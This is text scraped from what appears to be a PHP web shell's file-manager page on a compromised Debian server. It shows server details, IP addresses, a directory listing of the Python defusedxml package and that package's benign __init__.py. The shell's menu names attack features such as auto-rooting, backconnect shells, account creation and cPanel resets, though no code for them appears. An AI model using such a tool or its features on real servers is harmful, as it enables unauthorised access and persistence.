Linux biogene 3.16.0-11-amd64 #1 SMP Debian 3.16.84-1 (2020-06-09) x86_64
Apache
: 46.101.124.208 | : 3.148.109.137
Cant Read [ /etc/named.conf ]
5.6.40-0+deb8u12
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
python2.7 /
dist-packages /
defusedxml /
[ HOME SHELL ]
Name
Size
Permission
Action
ElementTree.py
3.94
KB
-rw-r--r--
ElementTree.pyc
3.9
KB
-rw-r--r--
__init__.py
1.16
KB
-rw-r--r--
__init__.pyc
1.38
KB
-rw-r--r--
cElementTree.py
864
B
-rw-r--r--
cElementTree.pyc
864
B
-rw-r--r--
common.py
5.94
KB
-rw-r--r--
common.pyc
6.82
KB
-rw-r--r--
expatbuilder.py
3.9
KB
-rw-r--r--
expatbuilder.pyc
4.41
KB
-rw-r--r--
expatreader.py
2.25
KB
-rw-r--r--
expatreader.pyc
2.83
KB
-rw-r--r--
lxml.py
4.81
KB
-rw-r--r--
lxml.pyc
5.89
KB
-rw-r--r--
minidom.py
1.76
KB
-rw-r--r--
minidom.pyc
1.39
KB
-rw-r--r--
pulldom.py
1.13
KB
-rw-r--r--
pulldom.pyc
1.16
KB
-rw-r--r--
sax.py
1.43
KB
-rw-r--r--
sax.pyc
1.6
KB
-rw-r--r--
xmlrpc.py
5.49
KB
-rw-r--r--
xmlrpc.pyc
5.69
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : __init__.py
# defusedxml # # Copyright (c) 2013 by Christian Heimes <christian@python.org> # Licensed to PSF under a Contributor Agreement. # See http://www.python.org/psf/license for licensing details. """Defuse XML bomb denial of service vulnerabilities """ from __future__ import print_function, absolute_import from .common import (DefusedXmlException, DTDForbidden, EntitiesForbidden, ExternalReferenceForbidden, NotSupportedError, _apply_defusing) def defuse_stdlib(): """Monkey patch and defuse all stdlib packages :warning: The monkey patch is an EXPERIMETNAL feature. """ defused = {} from . import cElementTree from . import ElementTree from . import minidom from . import pulldom from . import sax from . import expatbuilder from . import expatreader from . import xmlrpc xmlrpc.monkey_patch() defused[xmlrpc] = None for defused_mod in [cElementTree, ElementTree, minidom, pulldom, sax, expatbuilder, expatreader]: stdlib_mod = _apply_defusing(defused_mod) defused[defused_mod] = stdlib_mod return defused __version__ = "0.4.1"
Close